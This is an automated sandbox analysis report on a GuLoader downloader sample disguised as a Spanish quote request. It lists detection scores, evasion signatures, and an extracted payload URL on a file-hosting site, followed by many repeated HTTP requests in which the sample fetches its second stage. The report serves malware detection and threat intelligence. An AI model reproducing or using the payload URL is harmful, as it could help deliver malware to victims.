Windows Analysis Report
Solicitud de presupuesto.exe

Overview

General Information

Sample Name: Solicitud de presupuesto.exe
Analysis ID: 830606
MD5: e6f54ce2be4854fdca9c97450c347a2c
SHA1: f609993ae9cace1abf742553a12a21852d363d5d
SHA256: 69e3a2462654341256f2feb5c86c1c8bb514d9ab97a02917cd22640c1474cac9
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Potential malicious icon found
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to detect virtualization through RDTSC time measurements
Contains functionality to hide a thread from the debugger
C2 URLs / IPs found in malware configuration
Yara detected VB6 Downloader Generic
Machine Learning detection for sample
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Contains capabilities to detect virtual machines
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Solicitud de presupuesto.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: Solicitud de presupuesto.exe Virustotal: Detection: 78% Perma Link
Source: Solicitud de presupuesto.exe ReversingLabs: Detection: 70%
Machine Learning detection for sample
Source: Solicitud de presupuesto.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.0.Solicitud de presupuesto.exe.400000.0.unpack Avira: Label: TR/Injector.akytx
Source: 0.0.Solicitud de presupuesto.exe.400000.0.unpack Avira: Label: TR/Injector.akytx
Source: 00000001.00000002.575875706.0000000000560000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.mediafire.com/file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file", "User Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"}
Uses 32bit PE files
Source: Solicitud de presupuesto.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.16.53.48:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.53.48:443 -> 192.168.2.5:49750 version: TLS 1.2

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://www.mediafire.com/file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
